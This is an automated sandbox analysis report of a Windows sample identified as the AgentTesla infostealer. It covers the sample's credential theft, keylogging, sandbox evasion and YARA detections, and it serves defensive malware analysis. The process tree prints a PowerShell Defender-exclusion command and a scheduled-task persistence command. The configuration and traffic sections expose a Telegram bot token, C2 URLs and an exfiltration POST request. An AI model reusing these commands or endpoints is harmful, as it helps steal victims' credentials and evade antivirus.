Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.AIDetectNet.01.20229.6203

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetectNet.01.20229.6203 (renamed file extension from 6203 to exe)
Analysis ID:635380
MD5:adec785f7cbaa5af9c8c7fa50cf91baa
SHA1:d55fc2f774a1728526a753284e350aea08e3b17d
SHA256:fb6eb7efdf26e5f8eaab963dab6a7fb808724a4288d4df1fb8f146e13471e53d
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.AIDetectNet.01.20229.exe (PID: 3984 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe" MD5: ADEC785F7CBAA5AF9C8C7FA50CF91BAA)
    • powershell.exe (PID: 6688 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6820 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "5365166645", "Chat URL": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x5180b:$s1: file:///
      • 0x5171b:$s2: {11111-22222-10009-11112}
      • 0x5179b:$s3: {11111-22222-50001-00000}
      • 0x4ec21:$s4: get_Module
      • 0x4f067:$s5: Reverse
      • 0x5104a:$s6: BlockCopy
      • 0x50e8e:$s7: ReadByte
      • 0x5181d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
          • 0x5180b:$s1: file:///
          • 0x5171b:$s2: {11111-22222-10009-11112}
          • 0x5179b:$s3: {11111-22222-50001-00000}
          • 0x4ec21:$s4: get_Module
          • 0x4f067:$s5: Reverse
          • 0x5104a:$s6: BlockCopy
          • 0x50e8e:$s7: ReadByte
          • 0x5181d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
          15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32b38:$s10: logins
                • 0x325a5:$s11: credential
                • 0x2eb27:$g1: get_Clipboard
                • 0x2eb35:$g2: get_Keyboard
                • 0x2eb42:$g3: get_Password
                • 0x2fdf7:$g4: get_CtrlKeyDown
                • 0x2fe07:$g5: get_ShiftKeyDown
                • 0x2fe18:$g6: get_AltKeyDown
                Click to see the 41 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5365166645", "Chat URL": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument"}
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.6956.15.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendMessage"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\HksvOcmoc.exeReversingLabs: Detection: 30%
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                Source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: PARAMD.pdb source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr
                Source: Binary string: PARAMD.pdb8 source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da40272c67fce7Host: api.telegram.orgContent-Length: 993Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528150791.00000000032E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.526308491.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uyaXTK.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528068312.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000003.379771521.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527999593.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://VmuKuqO5f5glxfhci.org
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://VmuKuqO5f5glxfhci.org(t
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocumentdocument-----
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownHTTP traffic detected: POST /bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da40272c67fce7Host: api.telegram.orgContent-Length: 993Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.telegram.org
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 0_2_00AE6E280_2_00AE6E28
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 0_2_00AE6E180_2_00AE6E18
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 0_2_00AE70B70_2_00AE70B7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 0_2_00AE70C80_2_00AE70C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_02DBF37815_2_02DBF378
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_02DBF6C015_2_02DBF6C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_060AB7F015_2_060AB7F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_060AC54015_2_060AC540
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_060A7F6315_2_060A7F63
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_060A004015_2_060A0040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_060A212015_2_060A2120
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
